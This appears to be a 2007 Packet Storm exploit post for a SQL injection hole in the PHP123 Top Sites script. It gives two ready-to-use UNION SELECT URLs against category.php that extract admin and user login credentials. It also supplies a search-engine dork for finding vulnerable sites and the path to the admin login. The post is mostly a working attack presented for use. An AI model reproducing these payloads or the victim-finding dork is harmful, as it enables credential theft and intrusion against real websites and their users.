php123-sql.txt

2007-07-31T00:00:00
ID PACKETSTORM:58149
Type packetstorm
Reporter t0pp8uzz
Modified 2007-07-31T00:00:00

Description

                                        
                                            `--==+================================================================================+==--  
--==+ PHP123 Top Sites SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
  
  
AUTHOR: t0pP8uZz & xprog  
SITE: N/A  
DORK: allintext:"Browse our directory of our members top sites or create your own for free!"  
  
  
DESCRIPTION:   
pull out admin/users login credentials  
  
  
EXPLOITS:  
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/admin/*  
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/users/*  
  
  
NOTE/TIP:   
admin login is at /siteadmin/  
altavista also returns a few diffrent results, dnt use the allintext: thou.  
  
  
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org !  
  
  
--==+================================================================================+==--  
--==+ PHP123 Top Sites SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
`